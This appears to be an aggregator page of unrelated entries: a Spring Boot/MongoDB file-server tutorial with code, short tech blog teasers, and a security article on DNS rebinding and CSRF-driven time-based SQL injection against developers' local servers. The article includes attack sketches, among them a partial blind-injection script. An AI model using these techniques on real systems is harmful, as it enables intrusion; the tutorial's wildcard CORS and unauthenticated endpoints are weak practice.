          The focus is on building a rapid-development framework around the Spring Boot stack by integrating all of these technologies, and ultimately delivering a complete enterprise application. The difficulty is the sheer number of technologies, which are hard to master completely. The course is therefore arranged so that the first half gives focused explanations, with practical examples, of the more forward-looking (or less commonly taught) technologies, while the second half integrates everything, builds the rapid-development framework, and implements the blog system's features one by one. The case study is substantial, the features are professional, and the technology choices meet the requirements of enterprise application development.

          What does the project development workflow look like?

          • Review and practice each technology
          • Analyze the functional requirements and define the API
          • Implement the back-end interfaces
          • Implement the front-end features
          • Run complete tests

          Besides the course content itself, what extra services are included?

          In addition to instructor Q&A and fully open source code, there is a QQ group offering one-on-one help. The technologies covered in the course have also been written up as reference books that students can consult for free (see https://waylau.com/books/). A Spring Boot book related to this course will be published later; watching the videos alongside the book will help organize and consolidate the material.


                    Implementing a File Server with MongoDB and Spring Boot

          MongoDB is a product that sits between relational and non-relational databases; among non-relational databases it is the most feature-rich and the most relational-like, and it aims to provide a scalable, high-performance data storage solution for web applications. It supports a very loose data structure, the JSON-like BSON format, so it can store fairly complex data types.

          This article shows how to store binary files in MongoDB in order to implement a file server, MongoDB File Server.

          File server requirements

          This file server is aimed at storing small files, such as the images and ordinary documents used in a blog. Because MongoDB supports many data formats, storing binary data is no problem, so it is convenient for storing files. However, since MongoDB's BSON documents are limited in size (each document may not exceed 16 MB), this file server targets small files. For large files (over 16 MB), MongoDB already offers a mature product, GridFS, which readers can explore on their own.

          This article does not go into MongoDB concepts or basic usage; interested readers can consult other references, for example my book "分布式系统常用技术及案例分析" (Common Technologies and Case Studies of Distributed Systems), which also covers MongoDB.

          Environment

          The example uses the following development environment:

          • MongoDB 3.4.4
          • Spring Boot 1.5.3.RELEASE
          • Thymeleaf 3.0.3.RELEASE
          • Thymeleaf Layout Dialect 2.2.0
          • Embedded MongoDB 2.0.0
          • Gradle 3.5

          Spring Boot is used to quickly build a standalone runnable Java project; Thymeleaf serves as the front-end page template for displaying data; Embedded MongoDB, produced by Organization Flapdoodle OSS, is an embedded MongoDB that makes it easy to test MongoDB interfaces without starting a MongoDB server; Gradle is a new-generation build automation tool similar in concept to Apache Maven.

          For more on Spring Boot, see my open-source book "Spring Boot 教程" (Spring Boot Tutorial); for Thymeleaf, my open-source book "Thymeleaf 教程" (Thymeleaf Tutorial); and for Gradle, my open-source book "Gradle 3 用户指南" (Gradle 3 User Guide).

          build.gradle

          The project demonstrated in this article is organized and built with Gradle; if you are not familiar with Gradle, you can convert it to a Maven project yourself.

          The build.gradle file looks like this:

          // The buildscript block is executed before the rest of the script
          buildscript {
          
          	// ext defines dynamic (extra) properties
          	ext {
          		springBootVersion = '1.5.3.RELEASE'
          	}
          			
          	// Override the Thymeleaf and Thymeleaf Layout Dialect versions
          	ext['thymeleaf.version'] = '3.0.3.RELEASE'
          	ext['thymeleaf-layout-dialect.version'] = '2.2.0'
          	// Override the Embedded MongoDB dependency version
          	ext['embedded-mongo.version'] = '2.0.0'
          
          	// Use the Maven central repository (you can also specify other repositories)
          	repositories {
          		//mavenCentral()
          		maven {
          			url 'http://maven.aliyun.com/nexus/content/groups/public/'
          		}
          	}
          	
          	// Dependencies
          	dependencies {
          		// classpath declares dependencies the ClassLoader can use while executing the rest of the script
          		classpath("org.springframework.boot:spring-boot-gradle-plugin:${springBootVersion}")
          	}
          }
          
          // Apply plugins
          apply plugin: 'java'
          apply plugin: 'eclipse'
          apply plugin: 'org.springframework.boot'
          
          // Package as a jar and set the version
          version = '1.0.0'
          
          // JDK version used to compile the .java files
          sourceCompatibility = 1.8
          
          // Maven central is the default; a custom mirror repository is used here instead
          repositories {
          	//mavenCentral()
          	maven {
          		url 'http://maven.aliyun.com/nexus/content/groups/public/'
          	}
          }
          
          // Dependencies
          dependencies {
          	// Required to compile the production code
          	compile('org.springframework.boot:spring-boot-starter-web')
           
          	// Thymeleaf dependency
          	compile('org.springframework.boot:spring-boot-starter-thymeleaf')
          
          	// Spring Data MongoDB dependency
          	compile 'org.springframework.boot:spring-boot-starter-data-mongodb'
          	
          	// Embedded MongoDB dependency, used for testing
          	compile('de.flapdoodle.embed:de.flapdoodle.embed.mongo')
          
          	// Required to compile the tests; includes the production compile dependencies by default
          	testCompile('org.springframework.boot:spring-boot-starter-test')
          }
          
          

          The comments in the build.gradle file are already quite detailed, so I will not repeat what each configuration item means here.

          Domain objects

          Document class: File

          A document class is a concept similar to an entity in JPA.

          import org.springframework.data.mongodb.core.mapping.Document;
          
          @Document
          public class File {
          	@Id  // primary key
          	private String id;
              private String name; // file name
              private String contentType; // content type
              private long size;
              private Date uploadDate;
              private String md5;
              private byte[] content; // file content
              private String path; // file path
              
              ...
          	// getter/setter 
              ...
              
              protected File() {
              }
              
              public File(String name, String contentType, long size,byte[] content) {
              	this.name = name;
              	this.contentType = contentType;
              	this.size = size;
              	this.uploadDate = new Date();
              	this.content = content;
              }
             
              @Override
              public boolean equals(Object object) {
                  if (this == object) {
                      return true;
                  }
                  if (object == null || getClass() != object.getClass()) {
                      return false;
                  }
                  File fileInfo = (File) object;
                  return java.util.Objects.equals(size, fileInfo.size)
                          && java.util.Objects.equals(name, fileInfo.name)
                          && java.util.Objects.equals(contentType, fileInfo.contentType)
                          && java.util.Objects.equals(uploadDate, fileInfo.uploadDate)
                          && java.util.Objects.equals(md5, fileInfo.md5)
                          && java.util.Objects.equals(id, fileInfo.id);
              }
          
              @Override
              public int hashCode() {
                  return java.util.Objects.hash(name, contentType, size, uploadDate, md5, id);
              }
          
              @Override
              public String toString() {
                  return "File{"
                          + "name='" + name + '\''
                          + ", contentType='" + contentType + '\''
                          + ", size=" + size
                          + ", uploadDate=" + uploadDate
                          + ", md5='" + md5 + '\''
                          + ", id='" + id + '\''
                          + '}';
              }
          }
          

          The document class mainly uses Spring Data MongoDB annotations to mark it as a document in the NoSQL sense.

          Repository: FileRepository

          The repository provides the common data-access interface for talking to the database. The FileRepository interface simply extends org.springframework.data.mongodb.repository.MongoRepository; there is no need to implement it yourself, as Spring Data MongoDB implements the interface methods automatically.

          import org.springframework.data.mongodb.repository.MongoRepository;
          import com.waylau.spring.boot.fileserver.domain.File;
          
          public interface FileRepository extends MongoRepository<File, String> {
          }
          
          

          Service interface and implementation

          The FileService interface defines the CRUD operations for files; the query method is paginated to keep query performance high.

          public interface FileService {
          	/**
          	 * Save a file
          	 * @param File
          	 * @return
          	 */
          	File saveFile(File file);
          	
          	/**
          	 * Delete a file
          	 * @param File
          	 * @return
          	 */
          	void removeFile(String id);
          	
          	/**
          	 * Get a file by its id
          	 * @param File
          	 * @return
          	 */
          	File getFileById(String id);
          
          	/**
          	 * Paged query, sorted by upload time descending
          	 * @param pageIndex
          	 * @param pageSize
          	 * @return
          	 */
          	List<File> listFilesByPage(int pageIndex, int pageSize);
          }
          

          FileServiceImpl implements all the methods of FileService.

          @Service
          public class FileServiceImpl implements FileService {
          	
          	@Autowired
          	public FileRepository fileRepository;
          
          	@Override
          	public File saveFile(File file) {
          		return fileRepository.save(file);
          	}
          
          	@Override
          	public void removeFile(String id) {
          		fileRepository.delete(id);
          	}
          
          	@Override
          	public File getFileById(String id) {
          		return fileRepository.findOne(id);
          	}
          
          	@Override
          	public List<File> listFilesByPage(int pageIndex, int pageSize) {
          		Page<File> page = null;
          		List<File> list = null;
          		
          		Sort sort = new Sort(Direction.DESC,"uploadDate"); 
          		Pageable pageable = new PageRequest(pageIndex, pageSize, sort);
          		
          		page = fileRepository.findAll(pageable);
          		list = page.getContent();
          		return list;
          	}
          }
          

          Controller / API resource layer

          The FileController controller is the API provider, receiving user requests and returning responses. The API follows a RESTful style. For more on REST, see my open-source book "REST 实战" (REST in Action, https://github.com/waylau/rest-in-action).

          @CrossOrigin(origins = "*", maxAge = 3600)  // allow requests from any origin
          @Controller
          public class FileController {
          
              @Autowired
              private FileService fileService;
              
              @Value("${server.address}")
              private String serverAddress;
              
              @Value("${server.port}")
              private String serverPort;
              
              @RequestMapping(value = "/")
              public String index(Model model) {
              	// show the latest twenty entries
                  model.addAttribute("files", fileService.listFilesByPage(0,20)); 
                  return "index";
              }
          
              /**
               * Query files by page
               * @param pageIndex
               * @param pageSize
               * @return
               */
          	@GetMapping("files/{pageIndex}/{pageSize}")
              @ResponseBody
          	public List<File> listFilesByPage(@PathVariable int pageIndex, @PathVariable int pageSize){
          		return fileService.listFilesByPage(pageIndex, pageSize);
          	}
          			
              /**
               * Retrieve a file for download
               * @param id
               * @return
               */
              @GetMapping("files/{id}")
              @ResponseBody
              public ResponseEntity<Object> serveFile(@PathVariable String id) {
          
                  File file = fileService.getFileById(id);
          
                  if (file != null) {
                      return ResponseEntity
                              .ok()
                              .header(HttpHeaders.CONTENT_DISPOSITION, "attachment; fileName=\"" + file.getName() + "\"")
                              .header(HttpHeaders.CONTENT_TYPE, "application/octet-stream" )
                              .header(HttpHeaders.CONTENT_LENGTH, file.getSize()+"")
                              .header("Connection",  "close") 
                              .body( file.getContent());
                  } else {
                        return ResponseEntity.status(HttpStatus.NOT_FOUND).body("File was not found");
                  }
          
              }
              
              /**
               * Display a file inline (online view)
               * @param id
               * @return
               */
              @GetMapping("/view/{id}")
              @ResponseBody
              public ResponseEntity<Object> serveFileOnline(@PathVariable String id) {
          
                  File file = fileService.getFileById(id);
          
                  if (file != null) {
                      return ResponseEntity
                              .ok()
                              .header(HttpHeaders.CONTENT_DISPOSITION, "fileName=\"" + file.getName() + "\"")
                              .header(HttpHeaders.CONTENT_TYPE, file.getContentType() )
                              .header(HttpHeaders.CONTENT_LENGTH, file.getSize()+"")
                              .header("Connection",  "close") 
                              .body( file.getContent());
                  } else {
                        return ResponseEntity.status(HttpStatus.NOT_FOUND).body("File was not found");
                  }
          
              }
              
              /**
               * Upload via form submission
               * @param file
               * @param redirectAttributes
               * @return
               */
              @PostMapping("/")
              public String handleFileUpload(@RequestParam("file") MultipartFile file,
                                             RedirectAttributes redirectAttributes) {
          
                  try {
                  	File f = new File(file.getOriginalFilename(),  file.getContentType(), file.getSize(), file.getBytes());
                  	f.setMd5( MD5Util.getMD5(file.getInputStream()) );
                  	fileService.saveFile(f);
                  } catch (IOException | NoSuchAlgorithmException ex) {
                      ex.printStackTrace();
                      redirectAttributes.addFlashAttribute("message",
                              "Your " + file.getOriginalFilename() + " is wrong!");
                      return "redirect:/";
                  }
          
                  redirectAttributes.addFlashAttribute("message",
                          "You successfully uploaded " + file.getOriginalFilename() + "!");
          
                  return "redirect:/";
              }
           
              /**
               * Upload API
               * @param file
               * @return
               */
              @PostMapping("/upload")
              @ResponseBody
              public ResponseEntity<String> handleFileUpload(@RequestParam("file") MultipartFile file) {
              	File returnFile = null;
                  try {
                  	File f = new File(file.getOriginalFilename(),  file.getContentType(), file.getSize(),file.getBytes());
                  	f.setMd5( MD5Util.getMD5(file.getInputStream()) );
                  	returnFile = fileService.saveFile(f);
                  	String path = "//"+ serverAddress + ":" + serverPort + "/view/"+returnFile.getId();
                  	return ResponseEntity.status(HttpStatus.OK).body(path);
           
                  } catch (IOException | NoSuchAlgorithmException ex) {
                      ex.printStackTrace();
                      return ResponseEntity.status(HttpStatus.INTERNAL_SERVER_ERROR).body(ex.getMessage());
                  }
           
              }
              
          	/**
               * Delete a file
               * @param id
               * @return
               */
              @DeleteMapping("/{id}")
              @ResponseBody
              public ResponseEntity<String> deleteFile(@PathVariable String id) {
           
              	try {
          			fileService.removeFile(id);
          			return ResponseEntity.status(HttpStatus.OK).body("DELETE Success!");
          		} catch (Exception e) {
          			return ResponseEntity.status(HttpStatus.INTERNAL_SERVER_ERROR).body(e.getMessage());
          		}
              }
          }
          

          The @CrossOrigin(origins = "*", maxAge = 3600) annotation marks the API as accessible from other origins. For the annotation to take effect, a security configuration class is still required.

          Security configuration

          To support cross-origin requests, we add a security configuration class, SecurityConfig:

          @Configuration
          @EnableWebMvc
          public class SecurityConfig extends WebMvcConfigurerAdapter {
          
          	@Override
          	public void addCorsMappings(CorsRegistry registry) {
          		registry.addMapping("/**").allowedOrigins("*"); // allow cross-origin requests
          	}
          }
          

          Running the project

          There are several ways to run a Gradle-based Java project. Using the Spring Boot Gradle Plugin is one of the simplest; just run:

          $ gradlew bootRun
          

          For other ways to run it, see my open-source book "Spring Boot 教程" (Spring Boot Tutorial).

          Once the project is running, open http://localhost:8081 in a browser. The home page provides a demo upload interface; after uploading, you can see the details of the uploaded file.
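
          This assumes the usual Spring Boot application.properties; a minimal sketch matching the @Value placeholders used in FileController (values illustrative) is:

          server.address=localhost
          server.port=8081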

          The related APIs are exposed at http://localhost:8081/ , namely (a sample curl call follows the list):

          • GET /files/{pageIndex}/{pageSize} : query the uploaded files by page
          • GET /files/{id} : download a file
          • GET /view/{id} : preview a file online, e.g. display an image
          • POST /upload : upload a file
          • DELETE /{id} : delete a file
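
          As a quick, illustrative smoke test of the upload API from the command line (any small local file will do; on success the controller returns a //host:port/view/{id} path for the stored file):

          $ curl -F "file=@logo.png" http://localhost:8081/upload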

          Source code

          MongoDB File Server is an open-source product; the complete project source code is at https://github.com/waylau/mongodb-file-server.



                    Hosting a NodeJs Express Application on Amazon Web Services (EC2)        

          Updated 2014-09-23 - NVM and Ubuntu 14.04 notes

          For the past year or so I've been super intrigued by NodeJs. It's a very cool stack, and the thought of building an entire application (front and back) with Javascript certainly merits some attention. Add MongoDb (a javascript based, document database)


                    How to connect MongoDB to any BI or ODBC application        

          In this video, Magnitude’s engineer Jeff Bayntun will show you how to connect MongoDB to …

          The post How to connect MongoDB to any BI or ODBC application appeared first on Simba Technologies.


                    Pentaho 5.1 natively supports MongoDB and Yarn        
          Pentaho announces the availability of version 5.1 of its analytics and data integration platform.
                    How to create an interactive map of election results with Excel and CartoDB

          This tutorial is taken from a presentation I gave for a Hacks/Hackers Montréal Meetup. Become a member if you live in the area! Here I show you how to use the data from the 2011 Canadian general election to build an interactive map with CartoDB. CartoDB is a wonderful tool which, besides letting you create very beautiful […]

          The article Comment créer une carte interactive des résultats électoraux avec Excel et CartoDB appeared first on Nael Shiab.


                    First Open Chemistry Beta Release        

          Open Chemistry

          We are pleased to announce the first beta release of the Open Chemistry suite of cross platform, open-source, BSD-licensed tools and libraries - Avogadro 2, MoleQueue and MongoChem. They are being released in beta, before all planned features are complete, to get feedback from the community following the open-source mantra of “release early, release often”. We will be making regular releases over the coming months, as well as automatically generating nightly binaries. A Source article from 2011 introduced the project, slides from FOSDEM describe it more recently, and the 0.5.0 release binaries can be downloaded here.

          Open Chemistry workflow

          These three desktop applications can each be used independently, but also have the capability of working together. Avogadro 2 is a rewrite of Avogadro that addresses many of the limitations we saw. This includes things such as the rendering code, scalability, scriptability, and increased flexibility, enabling us to effectively address the current and upcoming challenges in computational chemistry and related fields. MoleQueue provides desktop services for executing standalone programs both locally and on remote batch schedulers, such as Sun Grid Engine, PBS and SLURM. MongoChem provides chemically-aware search, storage, and informatics visualization using MongoDB and VTK.

          Open Chemistry library organization

          Avogadro 2

          Avogadro 2 is a rewrite of Avogadro; please see the recently-published paper for more details on Avogadro 1. Avogadro has been very successful over the years, and we would like to thank all of our contributors and supporters, including the core development team: Geoff Hutchison, Donald Curtis, David Lonie, Tim Vandermeersch, Benoit Jacob, Carsten Niehaus, and Marcus Hanwell. We also recently obtained permission from almost all authors to relicense the existing code under the 3-clause BSD license, which will make migration of code to the new architecture much easier.

          Avogadro 2 rendering a molecular orbital

          Some notable new features of Avogadro 2 include:

          • Scalable data structures capable of addressing the needs of large molecular systems.
          • A flexible file I/O API supporting seamless addition of formats at runtime.
          • A Python-based input generator API, creating an input for a range of quantum codes.
          • A specialized scene graph for supporting scalable molecular rendering.
          • OpenGL 2.1/GLSL based rendering, employing point sprites, VBOs, etc.
          • Unit tests for core classes, with ongoing work to improve coverage.
          • Binary installers generated nightly.
          • Use of MoleQueue to run computational codes such as NWChem, MOPAC, GAMESS, etc.

          Avogadro is not yet feature complete, but we invite you to try it out along with the suite of applications as we continue to improve it. The new Avogadro libraries feature much finer granularity; whereas before we provided a single library with all API, there is now a layered API in multiple libraries. The Core and IO libraries have minimal dependencies, with the rendering library adding a dependence on OpenGL, and the Qt libraries adding Qt 4 dependencies. This allows us to reuse the code in many more places than was possible before, with rendering possible on a server without Qt/X, and the Core/IO libraries being suitable for command line use or integration into non-graphical applications.

          MoleQueue

          MoleQueue is a new application developed to satisfy the need to execute computational chemistry codes locally and remotely. Rather than adding this functionality directly to Avogadro 2, it has been developed as a standalone system-tray resident application that runs a graphical application and a local server (using local sockets for communication). It supports the configuration of multiple queues (local and remote), each containing one-or-more programs to be executed. Applications communicate with MoleQueue using JSON-RPC 2.0 over a local socket, and receive updates as the job state changes. A recent Source article describes MoleQueue in more detail.

          MoleQueue queue configuration

          In addition to the system-tray resident application, MoleQueue provides a Qt 4-based client library that can easily be integrated into Qt applications, providing a familiar signal-slot based API for job submission, monitoring, and retrieval. The project has remained general in its approach, containing no chemistry specific API, and has already been used by several other projects at Kitware in different application domains. Communicating with the MoleQueue server from other languages is quite simple, with the client code having minimal requirements for connecting to a named local socket and constructing JSON strings conforming to the JSON-RPC 2.0 specification.

          MongoChem

          MongoChem is another new application developed as part of the Open Chemistry suite of tools, leveraging MongoDB, VTK, and AvogadroLibs to provide chemical informatics on the desktop. It seeks to address the need for researchers and groups to be able to effectively store, index, search and retrieve relevant chemical data. It supports the use of a central database server where all data can be housed, and enables the significant feature set of MongoDB to be leveraged, such as sharding, replication and efficient storage of large data files. We have been able to reuse several powerful cheminformatics libraries such as Open Babel and Chemkit to generate identifiers, molecular fingerprints and other artifacts as well as developing out features in the Avogadro libraries to support approaches to large datasets involving many files.

          MongoChem

          We have taken advantage of the charts developed in VTK and 2D chemical structure depiction in Open Babel to deliver immersive charts that are capable of displaying multiple dimensions of the data. Linked selection allows a selection made in one view, such as the parallel coordinates view, to be reflected in the scatter plot matrix and the table view. The detail dialog for a given molecule shows 2D structure depiction, an interactive 3D visualization when geometry is available and support for tagging and/or annotation. We have also developed an early preview of a web interface to the same data using ParaViewWeb, enabling you to share data more widely if desired. This also features a 3D interactive view using the ParaViewWeb image streaming technology which works in almost all modern browsers.

          Putting Them Together

          Each of the applications in the Open Chemistry suite listens for connections on a named local socket, and provides a simple JSON-RPC 2.0 based API. Avogadro 2 is capable of generating input files for several computational chemistry codes, including GAMESS and NWChem, and can use MoleQueue to execute these programs and keep track of the job states. Avogadro 2 can also query MongoChem for similar molecules to the one currently displayed, and see a listing sorted by similarity. MongoChem is capable of searching large collections of molecules, and can use the RPC API to open any selected molecule in the active Avogadro 2 session.

          Acknowledgements

          The development of the Open Chemistry workbench has been funded by a US Army SBIR with the Engineering Research Development Center under contract (W912HZ-12-C-0005) at Kitware, Inc.

          Originally published on the Kitware blog


                    Comment on MongoDb text search by Using mongodb text search with node.js | David's Tech Blog        
          […] my last post I talked about enabling mongodb’s beta text search, which at least to me was a little less […]
                    Checking Whether a Specific Field Exists in MongoDB Using PHP
          Since MongoDB is a schema-free database that stores data as documents, the syntax for checking whether a specific field exists is important. First, take a look at the official documentation:

          https://docs.mongodb.com/manual/reference/operator/query/exists/

          The syntax uses $exists to determine whether a particular field exists. Translated into PHP, you can use something like the following
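
          (the original PHP snippet did not survive here; a minimal, hypothetical sketch of the equivalent filter, assuming the mongodb/mongodb library and an existing $collection handle, would be):

          // Hypothetical sketch: $collection is a MongoDB\Collection for the target collection
          $cursor = $collection->find(['field1' => ['$exists' => false]]);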


          to list the documents in the collection where field1 does not exist. If you use a particular field to mark data as processed or pending, this makes the check easy and means you do not have to create the field in advance; it is a very handy, practical technique.



                    MongoDB 3.4 and “multimodel” query        
          “Multimodel” database management is a hot new concept these days, notwithstanding that it’s been around since at least the 1990s. My clients at MongoDB of course had to join the train as well, but they’ve taken a clear and interesting stance: A query layer with multiple ways to query and analyze data. A separate data […]
                    Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls        

          Software and web developers, owners of the latest IOT gadgets and people who just like to surf the web at home have one thing in common, they are all protected by a firewall.

          Businesses typically protect their networks with hardware, dedicated and robust firewalls, while home users usually have it built in their routers. Firewalls are essential for internet security, since they prevent anyone from the outside to access the internal network, and possibly sensitive data. However, firewalls are no panacea. In some cases, malicious hackers can still attack a vulnerable web application that is hosted behind a firewall.

          In this blog post, we will explain the different methods attackers can use to access vulnerable web applications behind firewalls, and we will also explain what countermeasures can be taken to thwart such attempts.


          How many Developers are Vulnerable to These Types of Attacks?

          It is difficult to estimate how many web developers may be vulnerable to this type of attack. We did, however, run a survey with web developers, and here are some interesting facts:

          • 81% of respondents run their software on a web server
          • 89% claimed they keep their web server software up to date
          • 52% say they run vulnerable or still-in-development web applications on their server
          • 55% are running web apps in development on servers directly connected to the internet
          • 32% admitted to hardening the web applications on their test environment

          According to the above statistics, 52% of web developers can be vulnerable to the type of attacks documented in this article. That's quite a shocking statistic, but not a surprising one, as Ferruh Mavituna explained when announcing the web developers survey results. An even more shocking fact is that 55% of the respondents admit that from time to time these web applications are running on computers which are connected directly to the internet. That's definitely something that businesses should tackle at the earliest opportunity.

          A Typical Web Application Developer’s Test Setup

          As a web application developer it is impossible to write code without having a proper testing environment. Fortunately, it is easy to install all the necessary pre-configured applications typically used for testing, so the majority of the developers run a web server on their machine.

          For Windows, there are popular applications such as XAMPP, which installs Apache, MySQL and PHP, a common combination for web development. On Linux, this can be easily done by installing the needed packages using a package manager. Both methods have the advantage that Apache is preconfigured to a certain degree. However, in order to prevent the Apache web server from being publicly accessible, developers have to configure it to listen on 127.0.0.1:80 instead of 0.0.0.0:80, or else use a firewall to block incoming connections. But is this enough to block incoming connections and possible malicious attacks in a testing environment?

          Protected Test Web Server & Applications Are Still Vulnerable to Malicious Attacks

          Unfortunately many assume that the security measures mentioned above are enough to prevent anyone from sending requests to the web applications running on the test Apache web server. It is assumed that this form of Eggshell Security, hardened from the outside but vulnerable on the inside, allows them to run vulnerable test applications.

          People also often assume that they are safe, even if a vulnerable or compromised machine is in the same network as long as it does not contain personal data. However, it is still possible for an attacker to tamper with files or databases, some of which are typically later used in production environments. Attackers can also probe the internal network for weaknesses. In some cases, it is even possible to use methods like ARP-Spoofing to carry out Man-In-The-Middle (MITM) attacks.

          But how can an attacker gain access to the development environment, when it is correctly configured to only listen on the loopback interface? Or even better, it is not even accessible from the outside because of a firewall, or because it only allows whitelisted access from within the internal network? The answer is simple: Through the developer’s web browser.

          Attacking the Developer’s Vulnerable Test Setup Through the Web Browser


          Web browsers are considered to be the biggest attack surface on personal computers; their codebase and functionality are steadily growing, and over the years there have been some notoriously insecure browsers and plugins. Attackers also tend to target browsers due to shortcomings in the design of some modern protocols and standards. Most of them were built with good intentions, but they can also lead to serious vulnerabilities and easy cross-domain exploitation. For example, in some cases it is even possible to use the victim’s browser as a proxy and tunnel web requests through it.

          But new technologies are not the only problem with web browser security; there are much older issues too. One of the issues with the biggest impact is the fact that every website is allowed to send data to any other reachable website. Contrary to popular belief, the Same Origin Policy does not prevent a site from sending data to another website; it only prevents the browser from reading the response. Therefore attacker.com can easily send requests to 127.0.0.1, and that is obviously a big problem.

          In this article, we are going to explain how malicious attackers can execute a number of browser based attacks to retrieve data from the victim’s computer, which could be sitting behind a firewall or any other type of protection.

          Vulnerable Test Websites on a Local Machine

          The problem with Vulnerable Test Environments

          http://localhost/

          Security researchers and developers typically run vulnerable applications on their machines. Developers, for example, often have web applications that are still in the development stage, where security mechanisms such as CSRF tokens or authentication may not be in place yet.

          Security researchers have the same type of applications running on their computers. It is their job to find security issues, so they typically test vulnerable web applications, which makes them an easy target for these kinds of exploits.

          Since the Same Origin Policy (SOP) prevents the attacker from mapping the web application to search for vulnerabilities, he has two options for attacking the victim:

          1. Use a blind approach, during which the attacker has to brute force file and parameter names,
          2. Use a method with which he can actually view and explore the web application. This is where methods such as DNS rebinding come into play.

          DNS Rebinding Attack


          This attack method is simple and allows attackers to easily retrieve information from the victim’s computer if it is running a webserver. During this attack the malicious hacker exploits the web browser’s DNS resolution mechanism to retrieve information from the /secret/ subdirectory on the server, as explained below:

          1. The attacker sets up a website on a live domain, for example, attacker.com that is hosted on the IP address 11.22.33.44.
          2. The attacker configures a very short DNS cache time (TTL, time to live) for the FQDN record.
          3. He serves the victim a malicious script that, when executed, sends any data it finds back to the attacker-controlled server every few minutes.
          4. The attacker changes the IP address of the FQDN attacker.com to 127.0.0.1.
          5. Since the TTL was set to a very short time, the browser resolves the IP address of attacker.com again when the script tries to fetch the content of the /secret/ sub directory. The script does this with a delay of about one minute, to let the browser's DNS cache expire.
          6. Since the script is now running and the IP address of attacker.com is now set to 127.0.0.1, the attacker’s script effectively queries the content of 127.0.0.1/secret instead of 11.22.33.44/secret, thus retrieving the data from the victim’s /secret/ sub directory.

          It is very difficult for the victim to identify this type of attack since the domain name is still attacker.com. And since the malicious script runs on the same domain, it also partially bypasses the Same Origin Policy.
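
          To make the answer-switching at the heart of the attack more concrete, here is a toy Python sketch of the attacker's DNS logic. It is not a working DNS server, just an illustration of the steps above; the IP addresses and the attacker.com name are simply the ones used in the example.

          lookup_count = {}

          REAL_IP = "11.22.33.44"      # hosts the malicious page and script
          REBOUND_IP = "127.0.0.1"     # the victim's own machine

          def resolve(fqdn):
              """Return (ip, ttl) as the attacker-controlled DNS would answer."""
              # First lookup: hand out the real server so the page and script load.
              # Every later lookup: "rebind" the name to the victim's localhost.
              lookup_count[fqdn] = lookup_count.get(fqdn, 0) + 1
              ip = REAL_IP if lookup_count[fqdn] == 1 else REBOUND_IP
              return ip, 0  # TTL 0: the browser must not cache this answer

          print(resolve("attacker.com"))  # ('11.22.33.44', 0) - victim loads the page
          print(resolve("attacker.com"))  # ('127.0.0.1', 0)  - script now reads 127.0.0.1/secret/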

          DNS Rebinding is a Preventable Attack

          DNS rebinding attacks can be prevented at the web server level. We will talk more about prevention at the end of this article, but here is a short overview: as a developer, you should use FQDNs such as local.com on your local web server and whitelist those host headers, so that any HTTP request that does not carry a whitelisted host header is rejected.
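
          If the local test application happens to run on a Python stack, the same idea can be sketched in a few lines. The snippet below is only an illustration using a hypothetical Flask test app; the whitelist entries and the port are assumptions, not something prescribed here.

          # Reject any request whose Host header is not whitelisted. A rebound
          # request still carries the attacker's host name (e.g. attacker.com)
          # in the Host header, so it never reaches the application code.
          from flask import Flask, abort, request

          app = Flask(__name__)

          ALLOWED_HOSTS = {"127.0.0.1", "localhost", "local.com"}  # assumed whitelist

          @app.before_request
          def reject_unknown_hosts():
              host = request.host.split(":")[0]  # request.host may include a port
              if host not in ALLOWED_HOSTS:
                  abort(403)

          @app.route("/")
          def index():
              return "test app"

          if __name__ == "__main__":
              app.run(host="127.0.0.1", port=5000)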

          Shared hosting is prone to DNS rebinding only to a certain degree. This is because the web server determines which website to serve based on the host header. If the host header is not known to the web server, it returns the default website. So in this scenario, only the default host is vulnerable to such an attack.

          Same Origin Policy is not completely bypassed

          Since attacker.com is an entirely new domain to the user's browser, and only the IP address matches, it is not possible for the attacker to steal session information. Cookies are tied to a specific hostname by the browser, not to an IP address. This means that a cookie for http://127.0.0.1 is not valid for http://attacker.com, even though the latter now points to 127.0.0.1.

          However, in many cases a valid cookie is not needed, for example when a security researcher runs a web application that is vulnerable to command injection and requires no authentication. In such a case, the attacker can either use DNS rebinding or simple CSRF (once he knows the vulnerable file and parameter) to issue system commands.

          Do Not Run Unpatched Web Applications on Local Machines - It is Dangerous

          It is worth mentioning that there are many reasons why even non-developer users tend to have outdated software on the local network. It could be either because they forgot to update the software, or they do not know that an update is available. Many others do not update their software to avoid having possible compatibility issues.

          The method we will describe now is convenient if there are known vulnerable web applications on the victim's computer. We showed earlier how it is possible to identify and brute force WordPress instances in local networks using a technique called Cross Site History Manipulation, or XSHM. With XSHM it is possible to retrieve information about running applications and, under some circumstances, even get feedback on whether or not a CSRF attack has succeeded.

          This method is too conspicuous to be used for brute force attacks or to scan local networks, since it requires a refreshing window or redirects. However, it can be used stealthily for short checks, since multiple redirects are nothing unusual on modern websites. Legitimate reasons for them include OAuth implementations or ad networks that redirect users across different domains.

          So it is possible to quickly identify which CMS or web application is running on a given host. If there are known vulnerabilities, an attacker can use a known exploit and send the data back to himself, either by using JavaScript with DNS rebinding, out-of-band methods, or other Same Origin Policy breaches.

          SQL injection Vulnerabilities on Your Local Network


          Imagine a web application that is vulnerable to SQL injection in a SELECT statement, exploitable only through CSRF, and the attacker knows that an ID parameter in the admin panel is vulnerable. The application runs with the least privileges needed to successfully retrieve data. The attacker cannot use an out-of-band method on MySQL without root privileges, and since stacked queries do not work in such a setup, he also cannot simply append an INSERT statement to the query.

          However, he can use the sleep command which, combined with a condition, forces the SQL database to wait for a given number of seconds before it continues to execute the query. So, for example, the attacker issues a command such as the following:

          if the first character of the admin password is “a” sleep for 2 seconds.

          If the request above takes less than two seconds to complete, then the first character in the password is not an “a”. The attacker tries the same with the letter “b”. If the request takes two seconds or longer to complete, then the first character of the password is “b”. The attacker can use this method to guess the remaining characters of the password.
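
          As a rough sketch of the mechanics, the loop below shows how an attacker who could reach the application directly (for example from a compromised machine on the same network) would extract a value character by character with such time-based payloads. The URL, parameter name and payload shape are hypothetical; in the CSRF scenario discussed here, the same payloads would instead be delivered through the victim's browser, as shown in the next section.

          # Sketch of a time-based blind SQL injection guessing loop. Assumes the
          # attacker can send requests directly to the vulnerable app; the URL,
          # parameter and payload shape are illustrative only.
          import string
          import time
          import urllib.parse
          import urllib.request

          TARGET = "http://192.168.1.123/admin.php"   # hypothetical vulnerable page
          DELAY = 2                                    # seconds injected via SLEEP()
          CHARSET = string.ascii_lowercase + string.digits + "_$"

          def is_true(condition):
              """Return True if the injected condition made the query sleep."""
              payload = f"1 AND IF(({condition}), SLEEP({DELAY}), 0)"
              url = TARGET + "?page=users&id=" + urllib.parse.quote(payload)
              start = time.monotonic()
              try:
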